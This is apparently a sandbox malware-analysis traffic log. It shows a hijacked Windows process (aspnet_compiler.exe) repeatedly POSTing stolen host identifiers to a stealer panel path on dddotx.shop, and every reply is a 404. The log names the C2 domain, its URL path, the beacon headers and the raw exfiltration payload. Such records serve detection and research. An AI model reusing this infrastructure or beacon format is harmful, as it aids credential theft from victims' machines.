              38192.168.2.749742188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:44.185964108 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:44.190956116 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:44.852020025 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:44 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VrMoExIn6zCRLgBGDR0trGo6nr6hZxWEpppBkAXR0J6vM3%2BoCo5aGT2AQ%2BCo3BKomYi4QMzPgUqqcteldXMT5yA0GMpmCLY1oFxi9BOxosBHVRvtP943vzXEmTEHTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89974bbf8ac472-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              39192.168.2.749743188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:45.011918068 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:45.016788960 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:45.666337013 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:45 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ilnRTbzwidVBkYl%2F7gnjchWLcfaayS7uEkP5YEi2Drg2NXC0xu%2Fq3iywAuFf%2B22PIYBQ%2BizHYyYeeCliLwqQIwGOjJnyiMQVpCfaHDuUSK2BWdg5sE325ot0DLzesA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899750db7b8c77-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              40192.168.2.749744188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:45.823864937 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:45.828744888 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:46.545284986 CEST563INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:46 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xUEiqJ2%2FxBhjE3zR0Pq4uqI7ZGxLhRWDexXAPwS9hD9wvYeydR91PwGJrsM2Q2T42ExwdlXM7uEtagbWbtIwO13EZagTEyFV3bOjaPAzcGXwKstnubuhFL1CznJKag%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899755fcaa728d-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              41192.168.2.749745188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:46.706866026 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:46.711711884 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:47.442342997 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:47 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nAq9ymHsEFM7epHmG8y%2FSn1IMi0RwGTA35HdMyPn0WZo%2FWD0v3jhi7eP7I5SHsO0HeyKplTTCtBfInutuYBxMYPYRvQO%2FX2rc49Cu6w2Q1CUwCxArR5K3c7ZMrHHgw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89975b6ea580cd-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              42192.168.2.749746188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:47.588154078 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:47.595407009 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:48.276973009 CEST565INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:48 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ktE1omBrgppOCFhCJGAkavSlCweT3xpn4GPlS5Wp8MtdNRqLgNs6M2XM8fXtii5X7KJt%2FXArRKW6wNlZprTQM8ONs8VaeQ75t9spJJwkT9dYI8nxiperU90SvHF%2BUg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89976109c17281-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              43192.168.2.749747188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:48.432363987 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:48.437320948 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:49.076529980 CEST575INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:49 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zghoVkJEDBFU%2B%2BFypdatlXNFHIMZQlx0M3wY%2F5rnDC3j6sLWNDw0AhUiK7or6TdLpBSP%2FkzvH%2FH8alO15WRA2c4bh0OprjievX3M%2B70vHYfi2ClF%2BUYxp1GzpkxwsA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997663ed442b7-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              44192.168.2.749748188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:49.228828907 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:49.234721899 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:49.885318041 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:49 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JJmm8NuiJDkCvdiGCAwLZaGQQDnNT%2F1S31KHBTsiBStx%2BabQYBKt5mLXMd0LrWAKJhag5fB5wwAv1xEzAmZe%2FGKYp4P6xbmuShZWMXtDn5JpxspBg1ajhR8HBAINqw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89976b3fad432c-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              45192.168.2.749749188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:50.040664911 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:50.049266100 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:50.708355904 CEST567INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:50 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wpexswP98%2F2pDJcny2a9b1O4le5X4RQ4Cv%2BNl7m1%2BQ29LWwNP8YliG8dbqv7SfAMiw5WICI9NAHufIQMLy9GLYc6Ti0cDwUfMUOnQvV4VYxIe8ayudDFgmjTjaGZZw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997705d054240-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              46192.168.2.749750188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:50.853298903 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:50.858143091 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:51.172909975 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:51.507719040 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:51 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8fRbcMTi7zPtHQzgmfDcOtNe5KKlEoD8Tjow5ukjcdTWdPt6WqZTr8qKHf3pLTMmUHSW1ConLkwcBB1PIvjo36g%2BktdSrJgq%2F%2Bv1sgCbsi1GOrtQYec%2FrcAibjmD8w%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c899775599442d8-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              47192.168.2.749751188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:51.653358936 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:51.659792900 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:52.349291086 CEST599INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:52 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NUHIThiFS8tXEsyabsfo%2BCqRWUIQEZ62eJsfEAHuFSsNZHrJvzTM6hR2wsJWIU%2B5UR0oSwT%2FSPbnUV5NxjKiUh2TY3p77%2BjXgryPc9C6NMbFHyVuzqDy9shSppXCQA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89977a5b3832ca-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              48192.168.2.749752188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:52.629637957 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:52.634584904 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:53.355499029 CEST605INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:53 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cMuK6zE%2B5ZSslvpDKoPsORsgCE3a9%2Fc%2Fvw%2F7v0AdIKO79YinzjHDQ49LhIcpcbxygnnW7tLE3yOquD%2BV%2BElw5wqrnWN5iyHSNnL82eA%2FGdN39Wz9SxvPHOr0qTMJig%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997808cf05e6d-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              49192.168.2.749753188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:53.518424034 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:53.523329020 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:54.186008930 CEST597INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:54 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nEkA3O15eLFt7amdNK%2BX7yKyciZyTihYXc9Mz4uM1E7RSuqM4UYClZFHhVU%2B7N%2BdOmP76miVgGbLU7U0g3pP3B6HaUhyfesJOYL78nHLkeZDfp5eFZusm5Q1JG15sA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c8997861dbc0ca1-EWR
              alt-svc: h3=":443"; ma=86400
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              50192.168.2.749754188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:54.531418085 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:54.536452055 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:55.325730085 CEST563INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:55 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=POROGUvL4q4IXiL9faqhhGbKgg%2BbEmJhfXeeBiYnk1LTuSChrzp88RrezVuHwg26QSo1G63pVJpGU8YFdxY1jSPgdyJo1qkeRKr84Dv5mE4udHmFdhvCuXmLZWiZAw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89978c694ec345-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              51192.168.2.749755188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:55.480483055 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:55.485677958 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:56.126749992 CEST569INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:56 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XAo6esAYNKITwmUrNOf4gGk8ofwYsKn59ZAJbhIBvquSBZ3RrQQNpp1ym%2BoLbbsNuv4xfPVdVX983eO7SXFBo1gYCX%2Fw3On4u%2BWBpsobAN3spr2%2BoZCBjGkTuDHFbA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8c89979238a2438c-EWR
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              52192.168.2.749756188.114.97.380720C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              TimestampBytes transferredDirectionData
              Sep 25, 2024 10:19:56.296606064 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: dddotx.shop
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 925F43C2
              Content-Length: 165
              Connection: close
              Sep 25, 2024 10:19:56.301649094 CEST165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 35 00 31 00 36 00 38 00 39 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b
              Data Ascii: (ckav.rufrontdesk651689FRONTDESK-PC0FDD42EE188E931437F4FBE2C
              Sep 25, 2024 10:19:57.009186983 CEST571INHTTP/1.1 404 Not Found
              Date: Wed, 25 Sep 2024 08:19:56 GMT
              Content-Type: text/html; charset=UTF-8
              Connection: close
              Status: 404 Not Found
              CF-Cache-Status: DYNAMIC
